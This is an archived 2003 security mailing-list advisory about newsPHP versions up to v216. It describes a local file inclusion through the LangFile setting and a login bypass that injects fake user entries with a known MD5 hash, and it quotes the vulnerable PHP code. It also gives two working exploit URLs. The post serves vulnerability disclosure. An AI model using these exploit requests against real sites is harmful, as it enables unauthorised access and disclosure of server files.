newsPHP file inclusion & bad login validation

From: Dariusz 'Officerrr' Kolasinski (officerrrat_private)
Date: Sun Aug 24 2003 - 20:04:22 PDT

Next message: Crispin Cowan: "Re: Heterogeneity as a form of obscurity, and its usefulness"

Previous message: bugzillaat_private: "[Full-Disclosure] [RHSA-2003:213-01] Updated iptables packages are available"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

newsPHP arbitary file inclusion & bad login validation

===+++===+++===+++
Product: newsPHP
Version: <= v216
Vendor: http://www.nphp.net
Author: Officerrr <officerrrat_private>
Discover by: Officerrr <officerrrat_private>
Vendor Response: Not contacted yet...
===+++===+++===+++


Problem #1:
===+++===+++===+++
Attacker can include any existing file on the web server,
if the LangFile is not set in config (it is not set by default).


PHP Code/Location #1:
===+++===+++===+++
-- from nphpd.php
[..]
// We know what we are supposed to be doing
// now. Load in a custom language if they
// have it set.
[..]
Oh yeah, we are ;]
[..]
  if(isset($nphp_config["LangFile"]))
  {
   if(strtolower($nphp_config["LangFile"]) != "default" && $nphp_config["LangFile"] != "" && file_exists($nphp_config["LangFile"]))
   {   
     include($nphp_config["LangFile"]);
   }
  }
[...]


Exploit #1:
===+++===+++===+++
http://[host]/nphp/nphpd.php?nphp_config[LangFile]=/evil/file


Problem #2:
===+++===+++===+++  
User can preform any other action than 'login' without knowing
the password and valid username.


Snip #2:
===+++===+++===+++
md5('a') is '0cc175b9c0f1b6a831c399e269772661'


PHP Code/Location #2:
===+++===+++===+++
-- from nfunc.php
  function LoadSettings(&$config, &$users)
[...]
          $users[$id][] = eregi_replace("[\n\r]","",$raw_config_line[$x]);
[...]

-- from nphpd.php
[...]
LoadSettings($nphp_config, $nphp_users);
[...]
    for($i = 0; $i < count($nphp_users); $i++)
          {
                  if((strtolower($nphp_users[$i][0]) == strtolower($uname)) && ($nphp_users[$i][1] == md5($pword)))
                  {
[...]
// hmmmm so we can inject users using nphp_users[index] in url


Exploit #2:
===+++===+++===+++
http://[host]/nphp/?[action here, example: output]&
     pword=a&
     uname=[fake usernamehere]&
     nphp_users[user index here][0]=a&
     nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
     nphp_users[user index here][3]=5

-- 
Pozdrawiam,
Dariusz 'Officerrr' Kolasinski
[Linux Administrator] [gg: 516354] [uin: 83041742]
"Silent my voice, I've got no choice..."

Next message: Crispin Cowan: "Re: Heterogeneity as a form of obscurity, and its usefulness"
Previous message: bugzillaat_private: "[Full-Disclosure] [RHSA-2003:213-01] Updated iptables packages are available"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Aug 26 2003 - 18:24:48 PDT